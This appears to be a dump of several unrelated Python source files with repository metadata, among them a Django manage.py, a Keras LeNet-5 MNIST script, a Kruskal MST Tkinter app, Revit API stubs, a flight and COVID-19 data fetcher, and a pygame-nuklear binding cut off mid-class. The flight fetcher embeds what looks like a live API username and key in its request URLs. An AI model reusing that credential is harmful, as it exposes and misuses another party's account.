stylesheet_links = soup.findAll('link', rel='stylesheet')
for stylesheet_link in stylesheet_links:
html = controller.GetHTMLForStylesheetHRef(stylesheet_link['href'])
if html:
tmp = bs4.BeautifulSoup(html, 'html5lib').findAll('style')
assert len(tmp) == 1
stylesheet_link.replaceWith(tmp[0])
else:
stylesheet_link.extract()
# Remove comments if minifying.
if minify:
comments = soup.findAll(
text=lambda text: isinstance(text, bs4.Comment))
for comment in comments:
comment.extract()
if prettify:
return soup.prettify('utf-8').strip()
# We are done.
return unicode(soup).strip()
@property
def html_contents_without_links_and_script(self):
return self.GenerateHTML(
html_generation_controller.HTMLGenerationController())
class _Tag(object):
def __init__(self, tag, attrs):
self.tag = tag
self.attrs = attrs
def __repr__(self):
attr_string = ' '.join('%s="%s"' % (x[0], x[1]) for x in self.attrs)
return '<%s %s>' % (self.tag, attr_string)
class HTMLModuleParser():
def Parse(self, html):
if html is None:
html = ''
else:
if html.find('< /script>') != -1:
raise Exception('Escape script tags with <\/script>')
return HTMLModuleParserResults(html)
| [
"enrico.weigelt@gr13.net"
] | enrico.weigelt@gr13.net |
167e81e8614a1402305e6e1d74d76c804b0bcf19 | 74ba6afdb6c5173ba6fe3a1aa9402aa3b7801dea | /manage.py | 55b1c640342e6091340fa31424f9af2081c7490d | [] | no_license | YuTaoFighting/QNUOJ | 6c0ced86eb8b41f05d59d99c4d68e68f914397ca | 7740c49b5add3b81bcd681e46fcbefd04a5c4e15 | refs/heads/master | 2020-10-01T19:03:30.450055 | 2019-12-21T15:28:04 | 2019-12-21T15:28:04 | 227,604,716 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 803 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "QNUOJ.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| [
"13012529035@163.com"
] | 13012529035@163.com |
0154d7e296c022db6601b785bfdd0ae791710f99 | 02f75a4cf04392e15cf32cb84d9fd55834955fb6 | /2_assign/5_step.py | d6075b5ea153ab5cfe8302f543169b5f3c507f66 | [] | no_license | Essler/deeplearn | 6d2095d123d14ea6e45b1e194556d98632e58b6d | c8391390bd7dc627cf322c7a2cec6218ed56dcf2 | refs/heads/main | 2023-04-22T05:07:27.010753 | 2021-04-21T05:14:02 | 2021-04-21T05:14:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,037 | py | from keras.datasets import mnist
from keras.utils import np_utils, plot_model
from matplotlib import pyplot
from tensorflow.python.keras.models import Model
(train_images, train_labels), (test_images, test_labels) = mnist.load_data()
# 10 classes (numbers 0-9)
nb_classes = 10
# 28x28px single-channel (grayscale) images
img_rows, img_cols = 28, 28
train_labels = np_utils.to_categorical(train_labels, nb_classes)
test_labels = np_utils.to_categorical(test_labels, nb_classes)
train_images = train_images.reshape(train_images.shape[0], img_rows, img_cols, 1)
test_images = test_images.reshape(test_images.shape[0], img_rows, img_cols, 1)
input_shape = (img_rows, img_cols, 1)
# Change data type to 32-bit floats and normalize colors by dividing by 255 (the largest 8-bit color value)
train_images = train_images.astype('float32') / 255.0
test_images = test_images.astype('float32') / 255.0
print('train_images shape: ', train_images.shape)
print(train_images.shape[0], ' train samples')
print(test_images.shape[0], ' test samples')
batch_size = 128
epochs = 10
from keras.layers import Input, Convolution2D, AveragePooling2D, Flatten, Dense
inputs = Input(shape=(28,28,1))
print(inputs.shape)
print(inputs.dtype)
# C1
x = Convolution2D(6, kernel_size=(5,5), strides=(1,1), activation='tanh', input_shape=(28,28,1), padding='same')(inputs)
# S2
x = AveragePooling2D(pool_size=(2,2), strides=(2,2), padding='valid')(x)
# C3
x = Convolution2D(16, kernel_size=(5,5), strides=(1,1), activation='tanh', padding='valid')(x)
# S4
x = AveragePooling2D(pool_size=(2,2), strides=(2,2), padding='valid')(x)
# C5
x = Convolution2D(120, kernel_size=(5,5), strides=(1,1), activation='tanh', padding='valid')(x)
# Flatten
x = Flatten()(x)
# FC6
x = Dense(84, activation='tanh')(x)
# Output
outputs = Dense(10, activation='softmax')(x)
model = Model(inputs=inputs, outputs=outputs, name='mnist_lenet-5')
# Default all layers as not trainable
for layer in model.layers:
layer.trainable = False
# Then choose one, and only one, to train
# model.layers[0].trainable = True
# model.layers[1].trainable = True
# model.layers[2].trainable = True
# model.layers[3].trainable = True
# model.layers[4].trainable = True
model.layers[5].trainable = True
# model.layers[6].trainable = True
model.compile(loss='categorical_crossentropy', optimizer='SGD', metrics=['accuracy'])
history = model.fit(x=train_images, y=train_labels, batch_size=batch_size, epochs=epochs, verbose=1,
validation_data=(test_images, test_labels))
# Test model
score = model.evaluate(test_images, test_labels, verbose=0)
print('Test loss: {:.4f}, Test accuracy {:.2f}%'.format(score[0], score[1]*100))
train_acc = history.history['accuracy']
test_acc = history.history['val_accuracy']
pyplot.suptitle('LeNet-5 1-Layer Train')
pyplot.xlabel('Epoch')
pyplot.ylabel('Accuracy')
pyplot.xlim(1, epochs)
pyplot.plot(range(1, epochs+1), train_acc, 'r', label='Train')
pyplot.plot(range(1, epochs+1), test_acc, 'b', label='Test')
pyplot.legend()
pyplot.show()
| [
"Essler@users.noreply.github.com"
] | Essler@users.noreply.github.com |
f059eb687fca6ba374b05c14031bab341c8a0b52 | 6234ebee2721a1cd16531af37427d74a6efe5ed4 | /src/com/fans/stat/restful/v1/common.py | ebdc846f40cbe482a1c27324047bae548554a15d | [] | no_license | patronfeng/fans-data | 523a956b3a584b74a1e9803113fdf892db520f48 | 9ea7c2d94910d62e988973b03d6ce1385f8b10c4 | refs/heads/master | 2016-09-06T00:28:24.003468 | 2015-05-28T09:56:33 | 2015-05-28T09:56:33 | 36,434,237 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 202 | py | __author__ = 'ZENGFANGUI'
from src.com.fans.common.redis.RedisConnection import RedisCache
import pyes
from config import *
es_connection=pyes.ES(es_host)
redispool = RedisCache(redis_host,redis_port) | [
"ZENGFANGUI@MacBook-Air.local"
] | ZENGFANGUI@MacBook-Air.local |
a02bdc037ebc369befd1f7b1b78a5e1958fd16c5 | d2d2d4b7294c0ae08c0ca31e7a7030103c0cd73d | /setup.py | fc4f612019e561cb4c7b7f8ade6ee64f9d8cbea8 | [
"MIT"
] | permissive | mydatakeeper/python-distutilscross | b38f5d65241ece1ca5aab3471da08e049909ea7e | bd5052ca76d4e2cf226c9cd2d91408ec003e7c0c | refs/heads/master | 2020-05-19T20:01:09.555633 | 2019-05-06T12:40:02 | 2019-05-06T12:40:02 | 185,193,368 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,461 | py | from setuptools import setup, find_packages
long_description = """\
Really it lets you cross build binary extensions.
You need to export PYTHONXCPREFIX and LDFLAGS, something like::
$ export PYTHONXCPREFIX=/opt/eldk/ppc_4xxFP/usr
$ export LDFLAGS="-L/opt/eldk/ppc_4xxFP/lib -L/opt/eldk/ppc_4xxFP/usr/lib"
Some build environments also need you to specify the CC and LDSHARED
environment variables::
$ export CC="ppc_4xxFP-gcc -pthread"
$ export LDSHARED="$CC -shared"
It should pick up the correct include paths from the PYTHONXCPREFIX. To build
use::
$ python setup.py build -x
To make a cross compiled egg::
$ python setup.py build -x bdist_egg --plat-name linux-ppc --exclude-source-files
"""
setup(
name = "distutilscross",
version = "0.2",
description="Cross Compile Python Extensions",
long_description=long_description,
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Topic :: Software Development :: Build Tools',
],
keywords="distutils setuptools egg compile cross-compile",
author="Chris Lambacher",
author_email="chris@kateandchris.net",
url="http://bitbucket.org/lambacck/distutilscross/",
license='MIT',
packages = find_packages(),
entry_points = {
"distutils.commands": [
"build=distutilscross.crosscompile:build",
],
},
)
| [
"chris@kateandchris.net"
] | chris@kateandchris.net |
2f963f67f5c10bc648266f281cbcbbefbe1b06b3 | e3af70c6b4fe16f2be4bf141dc95c3b1d9af8afa | /Assignment1inPython/kruskal.py | ee84a4619e05fdc03df6f38dd232f5f86f260a92 | [] | no_license | DeleMax/Assignment1inPython | ae9543f9ef11e9f674a9d7f3ce21e5ce4432d9b0 | 7a708feff51deb3976d1e535fb89dd721b7e6c29 | refs/heads/master | 2020-12-02T04:20:25.258047 | 2016-09-01T18:10:35 | 2016-09-01T18:10:35 | 67,154,643 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,991 | py | import time
from tkinter import*
parent = dict()
rank = dict()
def make_set(vertice):
parent[vertice] = vertice
rank[vertice] = 0
def find(vertice):
if parent[vertice] != vertice:
parent[vertice] = find(parent[vertice])
return parent[vertice]
def union(vertice1, vertice2):
root1 = find(vertice1)
root2 = find(vertice2)
if root1 != root2:
if rank[root1] > rank[root2]:
parent[root2] = root1
else:
parent[root1] = root2
if rank[root1] == rank[root2]: rank[root2] += 1
def kruskal(graph):
for vertice in graph['vertices']:
make_set(vertice)
minimum_spanning_tree = set()
edges = list(graph['edges'])
edges.sort()
for edge in edges:
weight, vertice1, vertice2 = edge
if find(vertice1) != find(vertice2):
union(vertice1, vertice2)
minimum_spanning_tree.add(edge)
return minimum_spanning_tree
def do():
filename = entry_1.get()
start = time.time()
f = open(filename, 'r')
content = list(f)
graph = {'vertices': [], 'edges': []}
graph['vertices'] = range(0, len(content))
edges = set()
for i in range(len(content)):
str_arr = content[i].split()
for j in range(len(str_arr)):
edges.add((int(str_arr[j]),i,j))
graph['edges'] = edges
minimum_spanning_tree = kruskal(graph)
p = open("resultPython.txt", 'w+')
v= open("resultPython2.txt", 'w+')
result = '\n'.join([ str(myelement) for myelement in minimum_spanning_tree ])
p.write(result)
v.write("The total number of edges in the minimum spanning tree is: " + str(len(minimum_spanning_tree))+'\n')
v.write("The number of nodes is: " + str(len(content))+'\n')
v.write("The total cost of the spanning tree is: " + str(sum([x[0] for x in minimum_spanning_tree]))+'\n')
end = (time.time() - start)
v.write("Total Execution time = "+str(end)+" seconds")
v.close()
p.close()
f = open('resultPython2.txt','r')
conttent = set(f)
sprintt = '\n'.join([ str(myelement) for myelement in conttent ])
label_2.config(text=sprintt)
f.close()
def loadme():
f = open('resultPython.txt','r')
content = set(f)
sprint = '\n'.join([ str(myelement) for myelement in content ])
label_2.config(text=sprint)
f.close()
root = Tk()
label_l = Label(root, text = "File Name")
entry_1 = Entry(root)
label_2 = Label(root, text = '')
label_l.grid(row=0)
entry_1.grid(row=0, column=1)
label_2.grid(columnspan = 10)
c_1 = Checkbutton(root, text= "Use Kruskal's Algorithm")
c_2 = Checkbutton(root, text= "Use Prim's Algorithm")
c_1.select()
c_1.grid(columnspan=2)
c_2.grid(columnspan=2)
button_1 = Button(root, text = "Compute", command= do)
button_2 = Button(root, text = "Step", command = loadme)
button_1.grid(columnspan = 3)
button_2.grid(columnspan = 4)
root.mainloop()
| [
"bamideleajayi02@gmail.com"
] | bamideleajayi02@gmail.com |
1132547772e06d6b2ee93fee62cd3605b759ec0c | 60a831fb3c92a9d2a2b52ff7f5a0f665d4692a24 | /IronPythonStubs/release/stubs.min/Autodesk/Revit/DB/__init___parts/BindingMap.py | 686d18be3c7071d131cd785f06980c6c9a4a0c07 | [
"MIT"
] | permissive | shnlmn/Rhino-Grasshopper-Scripts | a9411098c5d1bbc55feb782def565d535b27b709 | 0e43c3c1d09fb12cdbd86a3c4e2ba49982e0f823 | refs/heads/master | 2020-04-10T18:59:43.518140 | 2020-04-08T02:49:07 | 2020-04-08T02:49:07 | 161,219,695 | 11 | 2 | null | null | null | null | UTF-8 | Python | false | false | 4,051 | py | class BindingMap(DefinitionBindingMap,IDisposable,IEnumerable):
"""
The parameters BindingMap contains all the parameter bindings that exist in the
Autodesk Revit project.
"""
def Clear(self):
"""
Clear(self: BindingMap)
This method is used to remove all the items in the map.
"""
pass
def Contains(self,key):
"""
Contains(self: BindingMap,key: Definition) -> bool
The Contains method is used to check if the parameter binding exists for one
definition.
key: A parameter definition which can be an existing definition or one from a shared
parameters file.
"""
pass
def Dispose(self):
""" Dispose(self: BindingMap,A_0: bool) """
pass
def Erase(self,key):
"""
Erase(self: BindingMap,key: Definition) -> int
This method is used to erase one item in the map.
"""
pass
def Insert(self,key,item,parameterGroup=None):
"""
Insert(self: BindingMap,key: Definition,item: Binding) -> bool
Creates a new parameter binding between a parameter and a set of categories.
key: A parameter definition which can be an existing definition or one from a shared
parameters file.
item: An InstanceBinding or TypeBinding object which contains the set of categories
to which the parameter should be bound.
Insert(self: BindingMap,key: Definition,item: Binding,parameterGroup: BuiltInParameterGroup) -> bool
Creates a new parameter binding between a parameter and a set of categories in
a specified group.
key: A parameter definition which can be an existing definition or one from a shared
parameters file.
item: An InstanceBinding or TypeBinding object which contains the set of categories
to which the parameter should be bound.
parameterGroup: The GroupID of the parameter definition.
"""
pass
def ReInsert(self,key,item,parameterGroup=None):
"""
ReInsert(self: BindingMap,key: Definition,item: Binding) -> bool
Removes an existing parameter and creates a new binding for a given parameter.
key: A parameter definition which can be an existing definition or one from a shared
parameters file.
item: An InstanceBinding or TypeBinding object which contains the set of categories
to which the parameter should be bound.
ReInsert(self: BindingMap,key: Definition,item: Binding,parameterGroup: BuiltInParameterGroup) -> bool
Removes an existing parameter and creates a new binding for a given parameter
in a specified group.
key: A parameter definition which can be an existing definition or one from a shared
parameters file.
item: An InstanceBinding or TypeBinding object which contains the set of categories
to which the parameter should be bound.
parameterGroup: The GroupID of the parameter definition.
"""
pass
def ReleaseManagedResources(self,*args):
""" ReleaseManagedResources(self: APIObject) """
pass
def ReleaseUnmanagedResources(self,*args):
""" ReleaseUnmanagedResources(self: APIObject) """
pass
def Remove(self,key):
"""
Remove(self: BindingMap,key: Definition) -> bool
The Remove method is used to remove a parameter binding.
key: A parameter definition which can be an existing definition or one from a shared
parameters file.
"""
pass
def __enter__(self,*args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self,*args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __getitem__(self,*args):
""" x.__getitem__(y) <==> x[y] """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __iter__(self,*args):
""" __iter__(self: IEnumerable) -> object """
pass
def __setitem__(self,*args):
""" x.__setitem__(i,y) <==> x[i]= """
pass
| [
"magnetscoil@gmail.com"
] | magnetscoil@gmail.com |
0c1ad9cb091f48da49c58549e01d5080ad33b491 | b82034236fe9988e7ba420a1b2fc56f4e185f726 | /FetchFlights.py | eb6c0f3158d13888d52969696dc9139c9b802b67 | [] | no_license | aguglani-umich/Final-Project-206 | fa7132e36fb53d66251d729be375029e6dbcee24 | e305974ff3a06085bc08ef09dff818ae0e71df57 | refs/heads/master | 2023-04-11T03:09:11.705470 | 2021-04-26T17:54:05 | 2021-04-26T17:54:05 | 320,954,467 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,479 | py | import json
import unittest
import os
import requests
import sqlite3
import re
# FetchFlights.py
# This peice of code calls two API's to gather data and store it in thee different tables: flights, locals, and COVID under the Data.db database
# The purpose of this peice of code is to fetch the arrivals for the day from the Detroit Airport (400 Arrivals Daily), find where they came from, and then get data about coronavirus positivity from those origins
''' FUNCTIONS '''
# PURPOSE: Figure out if the data.db database has any tables in it and if so how much data is in
# those tables to know how many flights from the arrivals board to offset
# INPUT: The cursor to the open database
# OUTPUT: Record Quantity
def databaseValidation(cur):
try:
counta = 0
cur.execute("SELECT * FROM Flights")
for flight in cur:
counta += 1
return counta
# We need to create tables from scratch if so
except:
return 0
# PURPOSE: Get connected to database
# INPUT: The database name
# OUTPUT: A cursor and connection
def setUpDatabase(db_name):
path = os.path.dirname(os.path.abspath(__file__))
conn = sqlite3.connect(path+'/'+db_name)
cur = conn.cursor()
return cur, conn
# PURPOSE: Retrive additional context for the origin airport of any given flight
# INPUT: The airport code of any given airport
# OUTPUT: A database ready tuple of the airport code, airport longitude, airport latitude,
# airport state, and airport country to be used for visulizations and to get COVID-19 data
def getAirportData(code):
print("Getting Airport Info from FlightAware about " + code)
data = requests.get("http://traveltimeiosapp:b34cb08f23579a0812280da25b76aee4e47bac16@flightxml.flightaware.com/json/FlightXML3/AirportInfo?airport_code=" + code)
try:
jsonData = json.loads(data.text)["AirportInfoResult"]
return (str(jsonData.get("airport_code", code)), float(jsonData.get("longitude", 0.0)), float(jsonData.get("latitude", 0.0)), str(jsonData.get("state", "--")), str(jsonData.get("city", "--")), str(jsonData.get("country_code", "--")))
except:
print("Uh-Oh... we are having some trouble connecting to FlightAware")
return (code, 0.0, 0.0, "--", "--", "--")
# PURPOSE: Get 25 Arrivals from FlightAware Airport Arrivals Boards API
# INPUT: This function takes in how many recent arrivals to offset from the most recent touchdown
# (this is rapidly changing with every landing)
# OUTPUT: returns the arrivals board for the DTW airport 25 flights at a time
def flightBoardDTW(offset):
print("Getting 25 Flights from FlightAware Arrivals Board API")
data = requests.get("http://traveltimeiosapp:b34cb08f23579a0812280da25b76aee4e47bac16@flightxml.flightaware.com/json/FlightXML3/AirportBoards?howMany=25&offset=" + str(offset) + "&airport_code=KDTW&include_ex_data=true&type=arrivals&filter=airline")
try:
return json.loads(data.text)["AirportBoardsResult"]["arrivals"]["flights"]
except:
print("Uh-Oh... we are having some trouble connecting to FlightAware")
return None
# PURPOSE: Get coronavirus statistics for a particular state
# INPUT: a particular state
# OUTPUT: basic coronavirus quantities from yesterday or last Friday if weekend
def getCoronaData(state):
print("Getting COVID data for " + state)
data = requests.get("https://localcoviddata.com/covid19/v1/cases/covidTracking?state=" + state + "&daysInPast=1")
try:
dataPack = json.loads(data.text)["historicData"][0]
return (state, int(dataPack.get("peoplePositiveNewCasesCt", 0)), int(dataPack.get("peopleNegativeNewCt", 0)), int(dataPack.get("peopleDeathCt", 0)))
except:
print("Uh-Oh... we are having some trouble connecting to Muelsoft COVID-19 Data")
return (state, 0, 0, 0)
# Runner of program that gets flights, loops through them, and calls remaining functions to complete file's mission
def main():
manifest = [] # list of airports in db
cur, conn = setUpDatabase("data.db")
validateDatabaseCount = databaseValidation(cur)
print("Starting at " + str(validateDatabaseCount) + "ith position in Database\n")
if(validateDatabaseCount == 0):
cur.execute("CREATE TABLE IF NOT EXISTS Flights (flightNumber TEXT PRIMARY KEY, origin TEXT, PAXCount INTEGER)")
cur.execute("CREATE TABLE IF NOT EXISTS Locals (code TEXT PRIMARY KEY, lng DOUBLE, lat DOUBLE, state TEXT, cityName TEXT, countryCode TEXT)")
cur.execute("CREATE TABLE IF NOT EXISTS Corona (state TEXT PRIMARY KEY, peoplePositiveNewCasesCt INTEGER, peopleNegativeNewCt INTEGER, peopleDeathCt INTEGER)")
else:
#Find which airports we already have in DB
cur.execute("SELECT code FROM Locals")
for code in cur.fetchall():
manifest.append(code[0])
grabFlights = flightBoardDTW(validateDatabaseCount+2)
for flight in grabFlights:
# Convience Print to Acknoledge Processing of the Flight
print("\nProcessing: " + flight["ident"])
# Inject flight into database accounting for any arrivals that may land while this is being run and push the departures list back
cur.execute("INSERT OR IGNORE INTO Flights (flightNumber, origin, PAXCount) VALUES (?, ?, ?) ", (str(flight["ident"]), str(flight["origin"]["code"]), (int(flight.get("seats_cabin_business", "0")) + int(flight.get("seats_cabin_coach", "0")))))
#if airport code is novel, call api for more data and then
if (str(flight["origin"]["code"]) not in manifest):
#Get & Store Data about the Airport from the flight
airportData = getAirportData(str(flight["origin"]["code"]))
cur.execute("INSERT OR IGNORE INTO Locals (code, lng, lat, state, cityName, countryCode) VALUES (?, ?, ?, ?, ?, ?) ", airportData)
#Get Corona Data for all US States that the flight originiated from. International Origins are not supported by the API and are injected into database
if(airportData[5] == "US"):
cur.execute("INSERT OR IGNORE INTO Corona (state, peoplePositiveNewCasesCt, peopleNegativeNewCt, peopleDeathCt) VALUES (?, ?, ?, ?) ", getCoronaData(airportData[3]))
else:
print("Found Data for " + str(flight["origin"]["code"]) + " in DB. Bypassing Call to save API Limit")
conn.commit()
conn.close()
main() | [
"aguglani@umich.edu"
] | aguglani@umich.edu |
45ae02db652e3be0161f27e1c06dc8c4cd2cc2e5 | 11398875e4f5cbcadc1747e73049dc99bca26908 | /06-time/time-01.py | 7f952d5930c3c2ef4b13a8eec60178b112e90857 | [] | no_license | asvkarthick/LearnPython | 37910faab5c4a18d6e08eb304ca1da9649e5b18f | 258e8c567ca3c8802d5e56f20b34317eba4c75f3 | refs/heads/master | 2021-06-23T06:30:46.681369 | 2021-06-11T19:35:40 | 2021-06-11T19:35:40 | 149,719,196 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 143 | py | #!/usr/bin/python
# Author: Karthick Kumaran <asvkarthick@gmail.com>
import time
print('Sleeping for 2 seconds')
time.sleep(2)
print('Done')
| [
"asvkarthick@gmail.com"
] | asvkarthick@gmail.com |
5774620808faf3c0f1ee1fe1a5e2e6bc220a25a5 | b04156fa48dfcf08ec84a26671b3942e38da7ae6 | /plasmiddb/plasmid_database/migrations/0003_plasmidfile.py | dcad249fd6fd8d9b52ef7147906b769207347245 | [] | no_license | andrewng1023/PlasmidWebApp | 67f96f58cc3717a6d746c52da3c3a48cb5316a99 | 562aac9e7273fea70b284f4f29504ce9d4f44746 | refs/heads/master | 2023-07-18T19:16:51.521163 | 2021-05-11T05:24:34 | 2021-05-11T05:24:34 | 329,831,363 | 1 | 0 | null | 2021-05-14T07:11:22 | 2021-01-15T06:44:34 | JavaScript | UTF-8 | Python | false | false | 878 | py | # Generated by Django 3.0.7 on 2020-06-07 01:17
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Adds the PlasmidFile model: an uploaded file attached to a Plasmid."""
    dependencies = [
        ('plasmid_database', '0002_auto_20200604_1819'),
    ]
    operations = [
        migrations.CreateModel(
            name='PlasmidFile',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('file', models.FileField(upload_to='')),
                ('filename', models.TextField()),
                ('description', models.TextField()),
                ('created', models.DateTimeField(auto_now_add=True)),
                # Deleting a Plasmid cascades to its files; reverse accessor is `plasmid.files`.
                ('plasmid', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='files', to='plasmid_database.Plasmid')),
            ],
        ),
    ]
| [
"james.lucas@berkeley.edu"
] | james.lucas@berkeley.edu |
2f86a501c2116cc1ba400e0cb3ce2532707ee09d | b307c310c4da7cb5182d0595790ee1e4cdacee81 | /pynk/nkpygame.py | f363f27bff14e5bb151c3c9261e13076b8e3fa7d | [] | no_license | nathanrw/nuklear-cffi | c7ca6af92482ef0476cd14730e6f0c94095b2164 | 173a5ec2a799e352dd6add86b6c300730e4bb0e0 | refs/heads/master | 2021-05-06T10:47:17.028830 | 2019-04-27T12:14:33 | 2019-04-27T12:14:33 | 114,173,114 | 41 | 6 | null | 2019-01-13T11:02:40 | 2017-12-13T21:56:33 | C | UTF-8 | Python | false | false | 15,629 | py | """
A library for interfacing with the nuklear C library from Python.
"""
import collections
import pygame
import unicodedata
from _nuklear import ffi, lib
@ffi.def_extern()
def pynk_text_width_callback(handle, height, text, text_length):
    """ Text measurement callback invoked from the nuklear C library. """
    # handle.ptr carries the cffi handle to the Python font object installed
    # by NkPygame; recover it and delegate the measurement.
    nkfont = ffi.from_handle(handle.ptr)
    python_text = ffi.string(text, text_length)
    return nkfont.text_width(height, python_text)
@ffi.def_extern()
def pynk_query_font_glyph_callback(handle, font_height, glyph, codepoint, next_codepoint):
    """ Font glyph callback - only used for nk_convert() VBO output. """
    # Recover the Python font from the nk_handle and let it fill the glyph struct.
    nkfont = ffi.from_handle(handle.ptr)
    nkfont.query_glyph(font_height, glyph, codepoint, next_codepoint)
class NkFont(object):
    """Abstract base for fonts usable by nuklear.
    The defaults describe a degenerate font: zero height, zero-width text,
    zeroed glyph metrics, no texture and no pygame font.  Concrete fonts
    override whichever hooks their renderer needs.
    """
    def height(self):
        """Return the line height of the font in pixels."""
        return 0
    def text_width(self, height, text):
        """Return the rendered pixel width of `text` at the given height."""
        return 0
    def query_glyph(self, height, glyph, codepoint, next_codepoint):
        """Zero out the texture coordinates and metrics of `glyph`.
        `glyph` is a struct nk_user_font_glyph.  Only nk_convert() VBO
        output ever calls this, so pygame software rendering can keep this
        no-op default.
        """
        for corner in (glyph.uv[0], glyph.uv[1]):
            corner.x = 0
            corner.y = 0
        glyph.offset.x = 0
        glyph.offset.y = 0
        glyph.width = 0
        glyph.height = 0
        glyph.xadvance = 0
    def get_texture_id(self):
        """Return the texture id used for VBO font rendering (unused here)."""
        return 0
    def get_pygame_font(self):
        """Return a pygame-compatible font, or None when software text
        rendering is not supported by this font."""
        return None
class NkPygameFont(NkFont):
    """NkFont implementation backed by a pygame font object."""
    def __init__(self, pygame_font):
        """Wrap `pygame_font` (a pygame.font.Font) for use by nuklear."""
        NkFont.__init__(self)
        self.__pygame_font = pygame_font
    def height(self):
        """Line height in pixels, straight from the pygame font."""
        return self.__pygame_font.get_height()
    def text_width(self, height, text):
        """Pixel width of `text`; the requested `height` hint is ignored."""
        width, _ = self.__pygame_font.size(text)
        return width
    def get_pygame_font(self):
        """Expose the wrapped pygame font for software text rendering."""
        return self.__pygame_font
class NkPygame(object):
    """
    Manages a nuklear context integrated with pygame.
    This class manages the lifetime of a nuklear context and takes care of
    stitching it into pygame - it provides methods for consuming pygame input
    and rendering to a pygame surface, and it sets up any required userdata
    pointers in the context during initialisation.
    However, this is not a high-level wrapper. You still need to call the
    nuklear C API on the context, which is exposed via a property.
    """
    class KeyMapping(object):
        """ Maps a pygame key press to a nuklear key sequence. """
        def __init__(self, pg, nk, pg_mod=pygame.KMOD_NONE):
            """ Map (pg, pg_mod) -> nk, where pg_mod is an optional modifier that
            defaults to KMOD_NONE. pg can be a sequence in which case both pygame
            keys are mapped to the same thing. nk can be a sequence in which case
            multiple nk keys are issued in response to the single pygame event. """
            # NOTE(review): collections.Iterable was removed in Python 3.10;
            # collections.abc.Iterable is the portable spelling - confirm which
            # interpreter versions must be supported before changing.
            self.pgs = pg
            if not isinstance(self.pgs, collections.Iterable):
                self.pgs = [self.pgs]
            self.nks = nk
            if not isinstance(self.nks, collections.Iterable):
                self.nks = [self.nks]
            self.pg_mod = pg_mod
    class KeyMap(object):
        """ Mapping between pygame and nuklear key constants. """
        def __init__(self, *keymappings):
            """ Initialise the key map. """
            # __keys maps pygame key -> {pygame modifier -> KeyMapping}.
            self.__keys = {}
            for mapping in keymappings:
                for pg in mapping.pgs:
                    self.__keys.setdefault(pg, {})
                    self.__keys[pg][mapping.pg_mod] = mapping
        def map_key(self, key, mod):
            """ Return the nuklear key sequence corresponding to a pygame key+modifier. """
            # Exact (key, mod) match first, then fall back to the unmodified
            # binding; an unmapped key yields an empty sequence.
            mapping = self.__keys.get(key, {}).get(mod, None)
            if mapping is None:
                mapping = self.__keys.get(key, {}).get(pygame.KMOD_NONE, None)
            if mapping is not None:
                return mapping.nks
            return []
    # Default pygame -> nuklear key bindings.
    # NOTE(review): K_END maps to [NK_KEY_TEXT_END, NK_KEY_TEXT_START] - the
    # second entry looks like it was meant to be NK_KEY_SCROLL_END; confirm.
    KEYMAP = KeyMap(
        KeyMapping([pygame.K_RSHIFT, pygame.K_LSHIFT], lib.NK_KEY_SHIFT),
        KeyMapping(pygame.K_DELETE, lib.NK_KEY_DEL),
        KeyMapping(pygame.K_RETURN, lib.NK_KEY_ENTER),
        KeyMapping(pygame.K_TAB, lib.NK_KEY_TAB),
        KeyMapping(pygame.K_BACKSPACE, lib.NK_KEY_BACKSPACE),
        KeyMapping(pygame.K_HOME, [lib.NK_KEY_TEXT_START, lib.NK_KEY_SCROLL_START]),
        KeyMapping(pygame.K_END, [lib.NK_KEY_TEXT_END, lib.NK_KEY_TEXT_START]),
        KeyMapping(pygame.K_PAGEDOWN, lib.NK_KEY_SCROLL_DOWN),
        KeyMapping(pygame.K_PAGEUP, lib.NK_KEY_SCROLL_UP),
        KeyMapping(pygame.K_z, lib.NK_KEY_TEXT_UNDO, pygame.KMOD_CTRL),
        KeyMapping(pygame.K_r, lib.NK_KEY_TEXT_REDO, pygame.KMOD_CTRL),
        KeyMapping(pygame.K_c, lib.NK_KEY_COPY, pygame.KMOD_CTRL),
        KeyMapping(pygame.K_v, lib.NK_KEY_PASTE, pygame.KMOD_CTRL),
        KeyMapping(pygame.K_x, lib.NK_KEY_CUT, pygame.KMOD_CTRL),
        KeyMapping(pygame.K_b, lib.NK_KEY_TEXT_LINE_START, pygame.KMOD_CTRL),
        KeyMapping(pygame.K_e, lib.NK_KEY_TEXT_LINE_END, pygame.KMOD_CTRL),
        KeyMapping(pygame.K_UP, lib.NK_KEY_UP),
        KeyMapping(pygame.K_DOWN, lib.NK_KEY_DOWN),
        KeyMapping(pygame.K_LEFT, lib.NK_KEY_LEFT),
        KeyMapping(pygame.K_LEFT, lib.NK_KEY_TEXT_WORD_LEFT, pygame.KMOD_CTRL),
        KeyMapping(pygame.K_RIGHT, lib.NK_KEY_RIGHT),
        KeyMapping(pygame.K_RIGHT, lib.NK_KEY_TEXT_WORD_RIGHT, pygame.KMOD_CTRL)
    )
    def __init__(self, font):
        """
        Construct an uninitialised NkPygame instance.
        'font' is the pygame font instance to use for the nuklear font.
        The resulting instance will not yet be initialised - attempting to
        get the context or do anything with it will result in exceptions being
